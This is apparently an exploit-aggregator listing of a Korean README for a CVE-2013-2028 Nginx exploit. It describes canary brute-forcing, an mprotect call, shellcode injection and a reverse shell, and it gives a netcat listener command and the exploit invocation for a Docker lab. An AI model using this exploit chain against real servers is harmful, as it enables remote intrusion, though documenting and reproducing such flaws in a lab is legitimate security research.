Sploitus

CVE-2013-2028-Exploit

kitploit Β· 2026-08-27

Exploit Code

MARKDOWN31 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-M4DRAT-CVE-2013-2028-EXPLOIT
# CVE-2013-2028 μ΅μŠ€ν”Œλ‘œμž‡

## 취약점 μ„ΈλΆ€ 사항

μ·¨μ•½ν•œ μ†Œν”„νŠΈμ›¨μ–΄: Nginx 1.3.9 < 1.4.0  
μˆ˜μ • 컀밋: https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7

취약점은 ngx_http_parse_chunked ν•¨μˆ˜μ— μ‘΄μž¬ν•©λ‹ˆλ‹€. 이 μ΅μŠ€ν”Œλ‘œμž‡μ€ ngx_http_parse_chunkedμ—μ„œ μ •μˆ˜ μ˜€λ²„ν”Œλ‘œμš°λ₯Ό λ°œμƒμ‹œν‚€κ³ , 이후 이λ₯Ό μ‚¬μš©ν•˜μ—¬ μŠ€νƒμ„ μ˜€λ²„ν”Œλ‘œμš°μ‹œμΌœ μ œμ–΄ 흐름을 νƒˆμ·¨ν•©λ‹ˆλ‹€.

## μ΅μŠ€ν”Œλ‘œμž‡ 상세

μ‹€μ œ μ΅μŠ€ν”Œλ‘œμž‡μ€ 4λ‹¨κ³„λ‘œ κ΅¬μ„±λ©λ‹ˆλ‹€:

  1. λ°”μ΄νŠΈ λ‹¨μœ„ 무차별 λŒ€μž…μ„ 톡해 μŠ€νƒ μΉ΄λ‚˜λ¦¬ κ°’ μ°ΎκΈ°
  2. rcx κ°’(lpthread λ‚΄ μ–΄λ”˜κ°€λ₯Ό 가리킴)을 μ‚¬μš©ν•˜μ—¬ mprotect μ£Όμ†Œ 계산. μ μ ˆν•œ 인수둜 mprotect 호좜.
  3. μ…Έμ½”λ“œλ₯Ό RWX λ©”λͺ¨λ¦¬ μœ„μΉ˜μ— 볡사.
  4. μ…Έμ½”λ“œλ‘œ μ ν”„ν•˜μ—¬ λ¦¬λ²„μŠ€ μ…Έ μ‹œμž‘.



## μž¬ν˜„ 방법

  1. 호슀트 μ‹œμŠ€ν…œμ—μ„œ λ¦¬μŠ€λ„ˆ μ‹œμž‘, 예: netcat μ‚¬μš©: `nc -lvp 4345`
  2. 가상 λ¨Έμ‹ μ—μ„œ 도컀 μ‹œμž‘: `sudo docker-compose up --build`
  3. μ΅μŠ€ν”Œλ‘œμž‡ μ‹€ν–‰: `python2 exploit.py -ra 127.0.0.1 -rp 8081 -la <λ¦¬μŠ€λ„ˆ λ¨Έμ‹  μ£Όμ†Œ> -lp <λ¦¬μŠ€λ„ˆ λ¨Έμ‹  포트>`
  4. μ΅μŠ€ν”Œλ‘œμž‡μ΄ μ‹€μ œ μΉ΄λ‚˜λ¦¬ 값을 μ°Ύκ³  λ¦¬λ²„μŠ€ 셸을 μ‹œμž‘ν•˜λ„λ‘ ν•©λ‹ˆλ‹€.



![Demo](https://assets.kitploit.com/production/public/readmes/28793/560585887fc0b9611bdf42666782ec9e86e38306424e3cd23e595be93e425099.png)